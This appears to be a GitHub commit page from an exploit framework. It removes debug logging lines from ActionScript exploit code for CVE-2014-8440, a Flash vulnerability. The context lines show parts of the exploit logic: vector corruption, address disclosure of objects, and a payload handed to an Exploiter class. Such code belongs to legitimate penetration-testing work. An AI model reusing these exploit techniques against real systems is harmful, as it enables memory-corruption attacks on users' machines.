Skip to content

Commit d9db456

Browse files
committed
Delete debug messages
1 parent cf8c6b5 commit d9db456

File tree

2 files changed

+0
-5
lines changed

2 files changed

+0
-5
lines changed

external/source/exploits/CVE-2014-8440/Exploit.as

Lines changed: 0 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -69,7 +69,6 @@ package
6969
if (i != corrupted_uv_index)
7070
object_vector[i] = null
7171
}
72-
Logger.alert('corrupted :) ' + this.uv.length.toString(16))
7372
exploiter = new Exploiter(this, platform, os, payload, uv)
7473
}
7574

external/source/exploits/CVE-2014-8440/Exploiter.as

Lines changed: 0 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -73,13 +73,9 @@ package
7373
{
7474
Logger.log("[*] Exploiter - disclose_objects()")
7575
byte_array_object = ev.at(pos) - 1
76-
Logger.log("[*] byte_array_object: " + byte_array_object.toString(16))
7776
main = ev.at(pos + 1) - 1
78-
Logger.log("[*] main: " + main.toString(16))
7977
stack_object = ev.at(pos + 2) - 1
80-
Logger.log("[*] stack_object: " + stack_object.toString(16))
8178
payload_space_object = ev.at(pos + 3) - 1
82-
Logger.log("[*] payload_space_object: " + payload_space_object.toString(16))
8379
if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
8480
return false
8581
}

0 commit comments

Comments
 (0)